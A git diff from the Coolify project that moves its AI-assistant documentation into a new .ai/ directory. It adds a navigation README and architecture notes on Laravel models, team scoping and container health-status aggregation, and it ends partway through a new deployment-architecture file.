diff --git a/.AI_INSTRUCTIONS_SYNC.md b/.AI_INSTRUCTIONS_SYNC.md index bbe0a90e1..b268064af 100644 --- a/.AI_INSTRUCTIONS_SYNC.md +++ b/.AI_INSTRUCTIONS_SYNC.md @@ -1,156 +1,41 @@ # AI Instructions Synchronization Guide -This document explains how AI instructions are organized and synchronized across different AI tools used with Coolify. +**This file has moved!** -## Overview +All AI documentation and synchronization guidelines are now in the `.ai/` directory. -Coolify maintains AI instructions in two parallel systems: +## New Locations -1. **CLAUDE.md** - For Claude Code (claude.ai/code) -2. **.cursor/rules/** - For Cursor IDE and other AI assistants +- **Sync Guide**: [.ai/meta/sync-guide.md](.ai/meta/sync-guide.md) +- **Maintaining Docs**: [.ai/meta/maintaining-docs.md](.ai/meta/maintaining-docs.md) +- **Documentation Hub**: [.ai/README.md](.ai/README.md) -Both systems share core principles but are optimized for their respective workflows. +## Quick Overview -## Structure - -### CLAUDE.md -- **Purpose**: Condensed, workflow-focused guide for Claude Code -- **Format**: Single markdown file -- **Includes**: - - Quick-reference development commands - - High-level architecture overview - - Core patterns and guidelines - - Embedded Laravel Boost guidelines - - References to detailed .cursor/rules/ documentation - -### .cursor/rules/ -- **Purpose**: Detailed, topic-specific documentation -- **Format**: Multiple .mdc files organized by topic -- **Structure**: - - `README.mdc` - Main index and overview - - `cursor_rules.mdc` - Maintenance guidelines - - Topic-specific files (testing-patterns.mdc, security-patterns.mdc, etc.) -- **Used by**: Cursor IDE, Claude Code (for detailed reference), other AI assistants - -## Cross-References - -Both systems reference each other: - -- **CLAUDE.md** → references `.cursor/rules/` for detailed documentation -- **.cursor/rules/README.mdc** → references `CLAUDE.md` for Claude Code workflow -- **.cursor/rules/cursor_rules.mdc** → notes that changes should sync with CLAUDE.md - -## Maintaining Consistency - -When updating AI instructions, follow these guidelines: - -### 1. Core Principles (MUST be consistent) -- Laravel version (currently Laravel 12) -- PHP version (8.4) -- Testing execution rules (Docker for Feature tests, mocking for Unit tests) -- Security patterns and authorization requirements -- Code style requirements (Pint, PSR-12) - -### 2. Where to Make Changes - -**For workflow changes** (how to run commands, development setup): -- Primary: `CLAUDE.md` -- Secondary: `.cursor/rules/development-workflow.mdc` - -**For architectural patterns** (how code should be structured): -- Primary: `.cursor/rules/` topic files -- Secondary: Reference in `CLAUDE.md` "Additional Documentation" section - -**For testing patterns**: -- Both: Must be synchronized -- `CLAUDE.md` - Contains condensed testing execution rules -- `.cursor/rules/testing-patterns.mdc` - Contains detailed examples and patterns - -### 3. Update Checklist - -When making significant changes: - -- [ ] Identify if change affects core principles (version numbers, critical patterns) -- [ ] Update primary location (CLAUDE.md or .cursor/rules/) -- [ ] Check if update affects cross-referenced content -- [ ] Update secondary location if needed -- [ ] Verify cross-references are still accurate -- [ ] Run: `./vendor/bin/pint CLAUDE.md .cursor/rules/*.mdc` (if applicable) - -### 4. Common Inconsistencies to Watch - -- **Version numbers**: Laravel, PHP, package versions -- **Testing instructions**: Docker execution requirements -- **File paths**: Ensure relative paths work from root -- **Command syntax**: Docker commands, artisan commands -- **Architecture decisions**: Laravel 10 structure vs Laravel 12+ structure - -## File Organization +All AI instructions are now organized in `.ai/` directory: ``` -/ -├── CLAUDE.md # Claude Code instructions (condensed) -├── .AI_INSTRUCTIONS_SYNC.md # This file -└── .cursor/ - └── rules/ - ├── README.mdc # Index and overview - ├── cursor_rules.mdc # Maintenance guide - ├── testing-patterns.mdc # Testing details - ├── development-workflow.mdc # Dev setup details - ├── security-patterns.mdc # Security details - ├── application-architecture.mdc - ├── deployment-architecture.mdc - ├── database-patterns.mdc - ├── frontend-patterns.mdc - ├── api-and-routing.mdc - ├── form-components.mdc - ├── technology-stack.mdc - ├── project-overview.mdc - └── laravel-boost.mdc # Laravel-specific patterns +.ai/ +├── README.md # Navigation hub +├── core/ # Project information +├── development/ # Dev workflows +├── patterns/ # Code patterns +└── meta/ # Documentation guides ``` -## Recent Updates +### For AI Assistants -### 2025-10-07 -- ✅ Added cross-references between CLAUDE.md and .cursor/rules/ -- ✅ Synchronized Laravel version (12) across all files -- ✅ Added comprehensive testing execution rules (Docker for Feature tests) -- ✅ Added test design philosophy (prefer mocking over database) -- ✅ Fixed inconsistencies in testing documentation -- ✅ Created this synchronization guide +- **Claude Code**: Use `CLAUDE.md` (references `.ai/` files) +- **Cursor IDE**: Use `.cursor/rules/coolify-ai-docs.mdc` (references `.ai/` files) +- **All Tools**: Browse `.ai/` directory for detailed documentation -## Maintenance Commands +### Key Principles -```bash -# Check for version inconsistencies -grep -r "Laravel [0-9]" CLAUDE.md .cursor/rules/*.mdc +1. **Single Source of Truth**: Each piece of information exists in ONE file only +2. **Cross-Reference**: Other files reference the source, don't duplicate +3. **Organized by Topic**: Core, Development, Patterns, Meta +4. **Version Consistency**: All versions in `.ai/core/technology-stack.md` -# Check for PHP version consistency -grep -r "PHP [0-9]" CLAUDE.md .cursor/rules/*.mdc +## For More Information -# Format all documentation -./vendor/bin/pint CLAUDE.md .cursor/rules/*.mdc - -# Search for specific patterns across all docs -grep -r "pattern_to_check" CLAUDE.md .cursor/rules/ -``` - -## Contributing - -When contributing documentation: - -1. Check both CLAUDE.md and .cursor/rules/ for existing documentation -2. Add to appropriate location(s) based on guidelines above -3. Add cross-references if creating new patterns -4. Update this file if changing organizational structure -5. Verify consistency before submitting PR - -## Questions? - -If unsure about where to document something: - -- **Quick reference / workflow** → CLAUDE.md -- **Detailed patterns / examples** → .cursor/rules/[topic].mdc -- **Both?** → Start with .cursor/rules/, then reference in CLAUDE.md - -When in doubt, prefer detailed documentation in .cursor/rules/ and concise references in CLAUDE.md. +See [.ai/meta/sync-guide.md](.ai/meta/sync-guide.md) for complete synchronization guidelines and [.ai/meta/maintaining-docs.md](.ai/meta/maintaining-docs.md) for documentation maintenance instructions. diff --git a/.ai/README.md b/.ai/README.md new file mode 100644 index 000000000..ea7812496 --- /dev/null +++ b/.ai/README.md @@ -0,0 +1,148 @@ +# Coolify AI Documentation + +Welcome to the Coolify AI documentation hub. This directory contains all AI assistant instructions organized by topic for easy navigation and maintenance. + +## Quick Start + +- **For Claude Code**: Start with [CLAUDE.md in root directory](../CLAUDE.md) +- **For Cursor IDE**: Check `.cursor/rules/coolify-ai-docs.mdc` which references this directory +- **For Other AI Tools**: Continue reading below + +## Documentation Structure + +### 📚 Core Documentation +Essential project information and architecture: + +- **[Technology Stack](core/technology-stack.md)** - All versions, packages, and dependencies (Laravel 12.4.1, PHP 8.4.7, etc.) +- **[Project Overview](core/project-overview.md)** - What Coolify is and how it works +- **[Application Architecture](core/application-architecture.md)** - System design and component relationships +- **[Deployment Architecture](core/deployment-architecture.md)** - How deployments work end-to-end, including Coolify Docker Compose extensions (custom fields) + +### 💻 Development +Day-to-day development practices: + +- **[Workflow](development/development-workflow.md)** - Development setup, commands, and daily workflows +- **[Testing Patterns](development/testing-patterns.md)** - How to write and run tests (Unit vs Feature, Docker requirements) +- **[Laravel Boost](development/laravel-boost.md)** - Laravel-specific guidelines and best practices + +### 🎨 Patterns +Code patterns and best practices by domain: + +- **[Database Patterns](patterns/database-patterns.md)** - Eloquent, migrations, relationships +- **[Frontend Patterns](patterns/frontend-patterns.md)** - Livewire, Alpine.js, Tailwind CSS +- **[Security Patterns](patterns/security-patterns.md)** - Authentication, authorization, security best practices +- **[Form Components](patterns/form-components.md)** - Enhanced form components with authorization +- **[API & Routing](patterns/api-and-routing.md)** - API design, routing conventions, REST patterns + +### 📖 Meta +Documentation about documentation: + +- **[Maintaining Docs](meta/maintaining-docs.md)** - How to update and improve this documentation +- **[Sync Guide](meta/sync-guide.md)** - Keeping documentation synchronized across tools + +## Quick Decision Tree + +**What do you need help with?** + +### Running Commands +→ [development/development-workflow.md](development/development-workflow.md) +- Frontend: `npm run dev`, `npm run build` +- Backend: `php artisan serve`, `php artisan migrate` +- Tests: Docker for Feature tests, mocking for Unit tests +- Code quality: `./vendor/bin/pint`, `./vendor/bin/phpstan` + +### Writing Tests +→ [development/testing-patterns.md](development/testing-patterns.md) +- **Unit tests**: No database, use mocking, run outside Docker +- **Feature tests**: Can use database, must run inside Docker +- Command: `docker exec coolify php artisan test` + +### Building UI +→ [patterns/frontend-patterns.md](patterns/frontend-patterns.md) or [patterns/form-components.md](patterns/form-components.md) +- Livewire components with server-side state +- Alpine.js for client-side interactivity +- Tailwind CSS 4.1.4 for styling +- Form components with built-in authorization + +### Database Work +→ [patterns/database-patterns.md](patterns/database-patterns.md) +- Eloquent ORM patterns +- Migration best practices +- Relationship definitions +- Query optimization + +### Security & Auth +→ [patterns/security-patterns.md](patterns/security-patterns.md) +- Team-based access control +- Policy and gate patterns +- Form authorization (canGate, canResource) +- API security + +### Laravel-Specific Questions +→ [development/laravel-boost.md](development/laravel-boost.md) +- Laravel 12 patterns +- Livewire 3 best practices +- Pest testing patterns +- Laravel conventions + +### Docker Compose Extensions +→ [core/deployment-architecture.md](core/deployment-architecture.md#coolify-docker-compose-extensions) +- Custom fields: `exclude_from_hc`, `content`, `isDirectory` +- How to use inline file content +- Health check exclusion patterns +- Volume creation control + +### Version Numbers +→ [core/technology-stack.md](core/technology-stack.md) +- **Single source of truth** for all version numbers +- Don't duplicate versions elsewhere, reference this file + +## Navigation Tips + +1. **Start broad**: Begin with project-overview or ../CLAUDE.md +2. **Get specific**: Navigate to topic-specific files for details +3. **Cross-reference**: Files link to related topics +4. **Single source**: Version numbers and critical data exist in ONE place only + +## For AI Assistants + +### Important Patterns to Follow + +**Testing Commands:** +- Unit tests: `./vendor/bin/pest tests/Unit` (no database, outside Docker) +- Feature tests: `docker exec coolify php artisan test` (requires database, inside Docker) +- NEVER run Feature tests outside Docker - they will fail with database connection errors + +**Version Numbers:** +- Always use exact versions from [technology-stack.md](core/technology-stack.md) +- Laravel 12.4.1, PHP 8.4.7, Tailwind 4.1.4 +- Don't use "v12" or "8.4" - be precise + +**Form Authorization:** +- ALWAYS include `canGate` and `:canResource` on form components +- See [form-components.md](patterns/form-components.md) for examples + +**Livewire Components:** +- MUST have exactly ONE root element +- See [frontend-patterns.md](patterns/frontend-patterns.md) for details + +**Code Style:** +- Run `./vendor/bin/pint` before finalizing changes +- Follow PSR-12 standards +- Use PHP 8.4 features (constructor promotion, typed properties, etc.) + +## Contributing + +When updating documentation: +1. Read [meta/maintaining-docs.md](meta/maintaining-docs.md) +2. Follow the single source of truth principle +3. Update cross-references when moving content +4. Test all links work +5. Run Pint on markdown files if applicable + +## Questions? + +- **Claude Code users**: Check [../CLAUDE.md](../CLAUDE.md) first +- **Cursor IDE users**: Check `.cursor/rules/coolify-ai-docs.mdc` +- **Documentation issues**: See [meta/maintaining-docs.md](meta/maintaining-docs.md) +- **Sync issues**: See [meta/sync-guide.md](meta/sync-guide.md) diff --git a/.ai/core/application-architecture.md b/.ai/core/application-architecture.md new file mode 100644 index 000000000..64038d139 --- /dev/null +++ b/.ai/core/application-architecture.md @@ -0,0 +1,604 @@ +# Coolify Application Architecture + +## Laravel Project Structure + +### **Core Application Directory** ([app/](mdc:app)) + +``` +app/ +├── Actions/ # Business logic actions (Action pattern) +├── Console/ # Artisan commands +├── Contracts/ # Interface definitions +├── Data/ # Data Transfer Objects (Spatie Laravel Data) +├── Enums/ # Enumeration classes +├── Events/ # Event classes +├── Exceptions/ # Custom exception classes +├── Helpers/ # Utility helper classes +├── Http/ # HTTP layer (Controllers, Middleware, Requests) +├── Jobs/ # Background job classes +├── Listeners/ # Event listeners +├── Livewire/ # Livewire components (Frontend) +├── Models/ # Eloquent models (Domain entities) +├── Notifications/ # Notification classes +├── Policies/ # Authorization policies +├── Providers/ # Service providers +├── Repositories/ # Repository pattern implementations +├── Services/ # Service layer classes +├── Traits/ # Reusable trait classes +└── View/ # View composers and creators +``` + +## Core Domain Models + +### **Infrastructure Management** + +#### **[Server.php](mdc:app/Models/Server.php)** (46KB, 1343 lines) +- **Purpose**: Physical/virtual server management +- **Key Relationships**: + - `hasMany(Application::class)` - Deployed applications + - `hasMany(StandalonePostgresql::class)` - Database instances + - `belongsTo(Team::class)` - Team ownership +- **Key Features**: + - SSH connection management + - Resource monitoring + - Proxy configuration (Traefik/Caddy) + - Docker daemon interaction + +#### **[Application.php](mdc:app/Models/Application.php)** (74KB, 1734 lines) +- **Purpose**: Application deployment and management +- **Key Relationships**: + - `belongsTo(Server::class)` - Deployment target + - `belongsTo(Environment::class)` - Environment context + - `hasMany(ApplicationDeploymentQueue::class)` - Deployment history +- **Key Features**: + - Git repository integration + - Docker build and deployment + - Environment variable management + - SSL certificate handling + +#### **[Service.php](mdc:app/Models/Service.php)** (58KB, 1325 lines) +- **Purpose**: Multi-container service orchestration +- **Key Relationships**: + - `hasMany(ServiceApplication::class)` - Service components + - `hasMany(ServiceDatabase::class)` - Service databases + - `belongsTo(Environment::class)` - Environment context +- **Key Features**: + - Docker Compose generation + - Service dependency management + - Health check configuration + +### **Team & Project Organization** + +#### **[Team.php](mdc:app/Models/Team.php)** (8.9KB, 308 lines) +- **Purpose**: Multi-tenant team management +- **Key Relationships**: + - `hasMany(User::class)` - Team members + - `hasMany(Project::class)` - Team projects + - `hasMany(Server::class)` - Team servers +- **Key Features**: + - Resource limits and quotas + - Team-based access control + - Subscription management + +#### **[Project.php](mdc:app/Models/Project.php)** (4.3KB, 156 lines) +- **Purpose**: Project organization and grouping +- **Key Relationships**: + - `hasMany(Environment::class)` - Project environments + - `belongsTo(Team::class)` - Team ownership +- **Key Features**: + - Environment isolation + - Resource organization + +#### **[Environment.php](mdc:app/Models/Environment.php)** +- **Purpose**: Environment-specific configuration +- **Key Relationships**: + - `hasMany(Application::class)` - Environment applications + - `hasMany(Service::class)` - Environment services + - `belongsTo(Project::class)` - Project context + +### **Database Management Models** + +#### **Standalone Database Models** +- **[StandalonePostgresql.php](mdc:app/Models/StandalonePostgresql.php)** (11KB, 351 lines) +- **[StandaloneMysql.php](mdc:app/Models/StandaloneMysql.php)** (11KB, 351 lines) +- **[StandaloneMariadb.php](mdc:app/Models/StandaloneMariadb.php)** (10KB, 337 lines) +- **[StandaloneMongodb.php](mdc:app/Models/StandaloneMongodb.php)** (12KB, 370 lines) +- **[StandaloneRedis.php](mdc:app/Models/StandaloneRedis.php)** (12KB, 394 lines) +- **[StandaloneKeydb.php](mdc:app/Models/StandaloneKeydb.php)** (11KB, 347 lines) +- **[StandaloneDragonfly.php](mdc:app/Models/StandaloneDragonfly.php)** (11KB, 347 lines) +- **[StandaloneClickhouse.php](mdc:app/Models/StandaloneClickhouse.php)** (10KB, 336 lines) + +**Common Features**: +- Database configuration management +- Backup scheduling and execution +- Connection string generation +- Health monitoring + +### **Configuration & Settings** + +#### **[EnvironmentVariable.php](mdc:app/Models/EnvironmentVariable.php)** (7.6KB, 219 lines) +- **Purpose**: Application environment variable management +- **Key Features**: + - Encrypted value storage + - Build-time vs runtime variables + - Shared variable inheritance + +#### **[InstanceSettings.php](mdc:app/Models/InstanceSettings.php)** (3.2KB, 124 lines) +- **Purpose**: Global Coolify instance configuration +- **Key Features**: + - FQDN and port configuration + - Auto-update settings + - Security configurations + +## Architectural Patterns + +### **Action Pattern** ([app/Actions/](mdc:app/Actions)) + +Using [lorisleiva/laravel-actions](mdc:composer.json) for business logic encapsulation: + +```php +// Example Action structure +class DeployApplication extends Action +{ + public function handle(Application $application): void + { + // Business logic for deployment + } + + public function asJob(Application $application): void + { + // Queue job implementation + } +} +``` + +**Key Action Categories**: +- **Application/**: Deployment and management actions +- **Database/**: Database operations +- **Server/**: Server management actions +- **Service/**: Service orchestration actions + +### **Repository Pattern** ([app/Repositories/](mdc:app/Repositories)) + +Data access abstraction layer: +- Encapsulates database queries +- Provides testable data layer +- Abstracts complex query logic + +### **Service Layer** ([app/Services/](mdc:app/Services)) + +Business logic services: +- External API integrations +- Complex business operations +- Cross-cutting concerns + +## Data Flow Architecture + +### **Request Lifecycle** + +1. **HTTP Request** → [routes/web.php](mdc:routes/web.php) +2. **Middleware** → Authentication, authorization +3. **Livewire Component** → [app/Livewire/](mdc:app/Livewire) +4. **Action/Service** → Business logic execution +5. **Model/Repository** → Data persistence +6. **Response** → Livewire reactive update + +### **Background Processing** + +1. **Job Dispatch** → Queue system (Redis) +2. **Job Processing** → [app/Jobs/](mdc:app/Jobs) +3. **Action Execution** → Business logic +4. **Event Broadcasting** → Real-time updates +5. **Notification** → User feedback + +## Security Architecture + +### **Multi-Tenant Isolation** + +```php +// Team-based query scoping +class Application extends Model +{ + public function scopeOwnedByCurrentTeam($query) + { + return $query->whereHas('environment.project.team', function ($q) { + $q->where('id', currentTeam()->id); + }); + } +} +``` + +### **Authorization Layers** + +1. **Team Membership** → User belongs to team +2. **Resource Ownership** → Resource belongs to team +3. **Policy Authorization** → [app/Policies/](mdc:app/Policies) +4. **Environment Isolation** → Project/environment boundaries + +### **Data Protection** + +- **Environment Variables**: Encrypted at rest +- **SSH Keys**: Secure storage and transmission +- **API Tokens**: Sanctum-based authentication +- **Audit Logging**: [spatie/laravel-activitylog](mdc:composer.json) + +## Configuration Hierarchy + +### **Global Configuration** +- **[InstanceSettings](mdc:app/Models/InstanceSettings.php)**: System-wide settings +- **[config/](mdc:config)**: Laravel configuration files + +### **Team Configuration** +- **[Team](mdc:app/Models/Team.php)**: Team-specific settings +- **[ServerSetting](mdc:app/Models/ServerSetting.php)**: Server configurations + +### **Project Configuration** +- **[ProjectSetting](mdc:app/Models/ProjectSetting.php)**: Project settings +- **[Environment](mdc:app/Models/Environment.php)**: Environment variables + +### **Application Configuration** +- **[ApplicationSetting](mdc:app/Models/ApplicationSetting.php)**: App-specific settings +- **[EnvironmentVariable](mdc:app/Models/EnvironmentVariable.php)**: Runtime configuration + +## Event-Driven Architecture + +### **Event Broadcasting** ([app/Events/](mdc:app/Events)) + +Real-time updates using Laravel Echo and WebSockets: + +```php +// Example event structure +class ApplicationDeploymentStarted implements ShouldBroadcast +{ + public function broadcastOn(): array + { + return [ + new PrivateChannel("team.{$this->application->team->id}"), + ]; + } +} +``` + +### **Event Listeners** ([app/Listeners/](mdc:app/Listeners)) + +- Deployment status updates +- Resource monitoring alerts +- Notification dispatching +- Audit log creation + +## Database Design Patterns + +### **Polymorphic Relationships** + +```php +// Environment variables can belong to multiple resource types +class EnvironmentVariable extends Model +{ + public function resource(): MorphTo + { + return $this->morphTo(); + } +} +``` + +### **Team-Based Soft Scoping** + +All major resources include team-based query scoping: + +```php +// Automatic team filtering +$applications = Application::ownedByCurrentTeam()->get(); +$servers = Server::ownedByCurrentTeam()->get(); +``` + +### **Configuration Inheritance** + +Environment variables cascade from: +1. **Shared Variables** → Team-wide defaults +2. **Project Variables** → Project-specific overrides +3. **Application Variables** → Application-specific values + +## Integration Patterns + +### **Git Provider Integration** + +Abstracted git operations supporting: +- **GitHub**: [app/Models/GithubApp.php](mdc:app/Models/GithubApp.php) +- **GitLab**: [app/Models/GitlabApp.php](mdc:app/Models/GitlabApp.php) +- **Bitbucket**: Webhook integration +- **Gitea**: Self-hosted Git support + +### **Docker Integration** + +- **Container Management**: Direct Docker API communication +- **Image Building**: Dockerfile and Buildpack support +- **Network Management**: Custom Docker networks +- **Volume Management**: Persistent storage handling + +### **SSH Communication** + +- **[phpseclib/phpseclib](mdc:composer.json)**: Secure SSH connections +- **Multiplexing**: Connection pooling for efficiency +- **Key Management**: [PrivateKey](mdc:app/Models/PrivateKey.php) model + +## Testing Architecture + +### **Test Structure** ([tests/](mdc:tests)) + +``` +tests/ +├── Feature/ # Integration tests +├── Unit/ # Unit tests +├── Browser/ # Dusk browser tests +├── Traits/ # Test helper traits +├── Pest.php # Pest configuration +└── TestCase.php # Base test case +``` + +### **Testing Patterns** + +- **Feature Tests**: Full request lifecycle testing +- **Unit Tests**: Individual class/method testing +- **Browser Tests**: End-to-end user workflows +- **Database Testing**: Factories and seeders + +## Performance Considerations + +### **Query Optimization** + +- **Eager Loading**: Prevent N+1 queries +- **Query Scoping**: Team-based filtering +- **Database Indexing**: Optimized for common queries + +### **Caching Strategy** + +- **Redis**: Session and cache storage +- **Model Caching**: Frequently accessed data +- **Query Caching**: Expensive query results + +### **Background Processing** + +- **Queue Workers**: Horizon-managed job processing +- **Job Batching**: Related job grouping +- **Failed Job Handling**: Automatic retry logic + +## Container Status Monitoring System + +### **Overview** + +Container health status is monitored and updated through **multiple independent paths**. When modifying status logic, **ALL paths must be updated** to ensure consistency. + +### **Critical Implementation Locations** + +#### **1. SSH-Based Status Updates (Scheduled)** +**File**: [app/Actions/Docker/GetContainersStatus.php](mdc:app/Actions/Docker/GetContainersStatus.php) +**Method**: `aggregateApplicationStatus()` (lines 487-540) +**Trigger**: Scheduled job or manual refresh +**Frequency**: Every minute (via `ServerCheckJob`) + +**Status Aggregation Logic**: +```php +// Tracks multiple status flags +$hasRunning = false; +$hasRestarting = false; +$hasUnhealthy = false; +$hasUnknown = false; // ⚠️ CRITICAL: Must track unknown +$hasExited = false; +// ... more states + +// Priority: restarting > degraded > running (unhealthy > unknown > healthy) +if ($hasRunning) { + if ($hasUnhealthy) return 'running (unhealthy)'; + elseif ($hasUnknown) return 'running (unknown)'; + else return 'running (healthy)'; +} +``` + +#### **2. Sentinel-Based Status Updates (Real-time)** +**File**: [app/Jobs/PushServerUpdateJob.php](mdc:app/Jobs/PushServerUpdateJob.php) +**Method**: `aggregateMultiContainerStatuses()` (lines 269-298) +**Trigger**: Sentinel push updates from remote servers +**Frequency**: Every ~30 seconds (real-time) + +**Status Aggregation Logic**: +```php +// ⚠️ MUST match GetContainersStatus logic +$hasRunning = false; +$hasUnhealthy = false; +$hasUnknown = false; // ⚠️ CRITICAL: Added to fix bug + +foreach ($relevantStatuses as $status) { + if (str($status)->contains('running')) { + $hasRunning = true; + if (str($status)->contains('unhealthy')) $hasUnhealthy = true; + if (str($status)->contains('unknown')) $hasUnknown = true; // ⚠️ CRITICAL + } +} + +// Priority: unhealthy > unknown > healthy +if ($hasRunning) { + if ($hasUnhealthy) $aggregatedStatus = 'running (unhealthy)'; + elseif ($hasUnknown) $aggregatedStatus = 'running (unknown)'; + else $aggregatedStatus = 'running (healthy)'; +} +``` + +#### **3. Multi-Server Status Aggregation** +**File**: [app/Actions/Shared/ComplexStatusCheck.php](mdc:app/Actions/Shared/ComplexStatusCheck.php) +**Method**: `resource()` (lines 48-210) +**Purpose**: Aggregates status across multiple servers for applications +**Used by**: Applications with multiple destinations + +**Key Features**: +- Aggregates statuses from main + additional servers +- Handles excluded containers (`:excluded` suffix) +- Calculates overall application health from all containers + +**Status Format with Excluded Containers**: +```php +// When all containers excluded from health checks: +return 'running:unhealthy:excluded'; // Container running but unhealthy, monitoring disabled +return 'running:unknown:excluded'; // Container running, health unknown, monitoring disabled +return 'running:healthy:excluded'; // Container running and healthy, monitoring disabled +return 'degraded:excluded'; // Some containers down, monitoring disabled +return 'exited:excluded'; // All containers stopped, monitoring disabled +``` + +#### **4. Service-Level Status Aggregation** +**File**: [app/Models/Service.php](mdc:app/Models/Service.php) +**Method**: `complexStatus()` (lines 176-288) +**Purpose**: Aggregates status for multi-container services +**Used by**: Docker Compose services + +**Status Calculation**: +```php +// Aggregates status from all service applications and databases +// Handles excluded containers separately +// Returns status with :excluded suffix when all containers excluded +if (!$hasNonExcluded && $complexStatus === null && $complexHealth === null) { + // All services excluded - calculate from excluded containers + return "{$excludedStatus}:excluded"; +} +``` + +### **Status Flow Diagram** + +``` +┌─────────────────────────────────────────────────────────────┐ +│ Container Status Sources │ +└─────────────────────────────────────────────────────────────┘ + │ + ┌────────────────────┼────────────────────┐ + │ │ │ + ▼ ▼ ▼ +┌───────────────┐ ┌─────────────────┐ ┌──────────────┐ +│ SSH-Based │ │ Sentinel-Based │ │ Multi-Server │ +│ (Scheduled) │ │ (Real-time) │ │ Aggregation │ +├───────────────┤ ├─────────────────┤ ├──────────────┤ +│ ServerCheck │ │ PushServerUp- │ │ ComplexStatus│ +│ Job │ │ dateJob │ │ Check │ +│ │ │ │ │ │ +│ Every ~1min │ │ Every ~30sec │ │ On demand │ +└───────┬───────┘ └────────┬────────┘ └──────┬───────┘ + │ │ │ + └────────────────────┼────────────────────┘ + │ + ▼ + ┌───────────────────────┐ + │ Application/Service │ + │ Status Property │ + └───────────────────────┘ + │ + ▼ + ┌───────────────────────┐ + │ UI Display (Livewire) │ + └───────────────────────┘ +``` + +### **Status Priority System** + +All status aggregation locations **MUST** follow the same priority: + +**For Running Containers**: +1. **unhealthy** - Container has failing health checks +2. **unknown** - Container health status cannot be determined +3. **healthy** - Container is healthy + +**For Non-Running States**: +1. **restarting** → `degraded (unhealthy)` +2. **running + exited** → `degraded (unhealthy)` +3. **dead/removing** → `degraded (unhealthy)` +4. **paused** → `paused` +5. **created/starting** → `starting` +6. **exited** → `exited (unhealthy)` + +### **Excluded Containers** + +When containers have `exclude_from_hc: true` flag or `restart: no`: + +**Behavior**: +- Status is still calculated from container state +- `:excluded` suffix is appended to indicate monitoring disabled +- UI shows "(Monitoring Disabled)" badge +- Action buttons respect the actual container state + +**Format**: `{actual-status}:excluded` +**Examples**: `running:unknown:excluded`, `degraded:excluded`, `exited:excluded` + +**All-Excluded Scenario**: +When ALL containers are excluded from health checks: +- All three status update paths (PushServerUpdateJob, GetContainersStatus, ComplexStatusCheck) **MUST** calculate status from excluded containers +- Status is returned with `:excluded` suffix (e.g., `running:healthy:excluded`) +- **NEVER** skip status updates - always calculate from excluded containers +- This ensures consistent status regardless of which update mechanism runs +- Shared logic is in `app/Traits/CalculatesExcludedStatus.php` + +### **Important Notes for Developers** + +✅ **Container Status Aggregation Service**: + +The container status aggregation logic is centralized in `App\Services\ContainerStatusAggregator`. + +**Status Format Standard**: +- **Backend/Storage**: Colon format (`running:healthy`, `degraded:unhealthy`) +- **UI/Display**: Transform to human format (`Running (Healthy)`, `Degraded (Unhealthy)`) + +1. **Using the ContainerStatusAggregator Service**: + - Import `App\Services\ContainerStatusAggregator` in any class needing status aggregation + - Two methods available: + - `aggregateFromStrings(Collection $statusStrings, int $maxRestartCount = 0)` - For pre-formatted status strings + - `aggregateFromContainers(Collection $containers, int $maxRestartCount = 0)` - For raw Docker container objects + - Returns colon format: `running:healthy`, `degraded:unhealthy`, etc. + - Automatically handles crash loop detection via `$maxRestartCount` parameter + +2. **State Machine Priority** (handled by service): + - Restarting → `degraded:unhealthy` (highest priority) + - Crash loop (exited with restarts) → `degraded:unhealthy` + - Mixed state (running + exited) → `degraded:unhealthy` + - Running → `running:unhealthy` / `running:unknown` / `running:healthy` + - Dead/Removing → `degraded:unhealthy` + - Paused → `paused:unknown` + - Starting/Created → `starting:unknown` + - Exited → `exited:unhealthy` (lowest priority) + +3. **Test both update paths**: + - Run unit tests: `./vendor/bin/pest tests/Unit/ContainerStatusAggregatorTest.php` + - Run integration tests: `./vendor/bin/pest tests/Unit/` + - Test SSH updates (manual refresh) + - Test Sentinel updates (wait 30 seconds) + +4. **Handle excluded containers**: + - All containers excluded (`exclude_from_hc: true`) - Use `CalculatesExcludedStatus` trait + - Mixed excluded/non-excluded containers - Filter then use `ContainerStatusAggregator` + - Containers with `restart: no` - Treated same as `exclude_from_hc: true` + +5. **Use shared trait for excluded containers**: + - Import `App\Traits\CalculatesExcludedStatus` in status calculation classes + - Use `getExcludedContainersFromDockerCompose()` to parse exclusions + - Use `calculateExcludedStatus()` for full Docker inspect objects (ComplexStatusCheck) + - Use `calculateExcludedStatusFromStrings()` for status strings (PushServerUpdateJob, GetContainersStatus) + +### **Related Tests** + +- **[tests/Unit/ContainerStatusAggregatorTest.php](mdc:tests/Unit/ContainerStatusAggregatorTest.php)**: Core state machine logic (42 comprehensive tests) +- **[tests/Unit/ContainerHealthStatusTest.php](mdc:tests/Unit/ContainerHealthStatusTest.php)**: Health status aggregation integration +- **[tests/Unit/PushServerUpdateJobStatusAggregationTest.php](mdc:tests/Unit/PushServerUpdateJobStatusAggregationTest.php)**: Sentinel update logic +- **[tests/Unit/ExcludeFromHealthCheckTest.php](mdc:tests/Unit/ExcludeFromHealthCheckTest.php)**: Excluded container handling + +### **Common Bugs to Avoid** + +✅ **Prevented by ContainerStatusAggregator Service**: +- ❌ **Old Bug**: Forgetting to track `$hasUnknown` flag → ✅ Now centralized in service +- ❌ **Old Bug**: Inconsistent priority across paths → ✅ Single source of truth +- ❌ **Old Bug**: Forgetting to update all 4 locations → ✅ Only one location to update + +**Still Relevant**: + +❌ **Bug**: Forgetting to filter excluded containers before aggregation +✅ **Fix**: Always use `CalculatesExcludedStatus` trait to filter before calling `ContainerStatusAggregator` + +❌ **Bug**: Not passing `$maxRestartCount` for crash loop detection +✅ **Fix**: Calculate max restart count from containers and pass to `aggregateFromStrings()`/`aggregateFromContainers()` + +❌ **Bug**: Not handling excluded containers with `:excluded` suffix +✅ **Fix**: Check for `:excluded` suffix in UI logic and button visibility diff --git a/.ai/core/deployment-architecture.md b/.ai/core/deployment-architecture.md new file mode 100644 index 000000000..927bdc8de --- /dev/null +++ b/.ai/core/deployment-architecture.md @@ -0,0 +1,666 @@ +# Coolify Deployment Architecture + +## Deployment Philosophy + +Coolify orchestrates **Docker-based deployments** across multiple servers with automated configuration generation, zero-downtime deployments, and comprehensive monitoring. + +## Core Deployment Components + +### Deployment Models +- **[Application.php](mdc:app/Models/Application.php)** - Main application entity with deployment configurations +- **[ApplicationDeploymentQueue.php](mdc:app/Models/ApplicationDeploymentQueue.php)** - Deployment job orchestration +- **[Service.php](mdc:app/Models/Service.php)** - Multi-container service definitions +- **[Server.php](mdc:app/Models/Server.php)** - Target deployment infrastructure + +### Infrastructure Management +- **[PrivateKey.php](mdc:app/Models/PrivateKey.php)** - SSH key management for secure server access +- 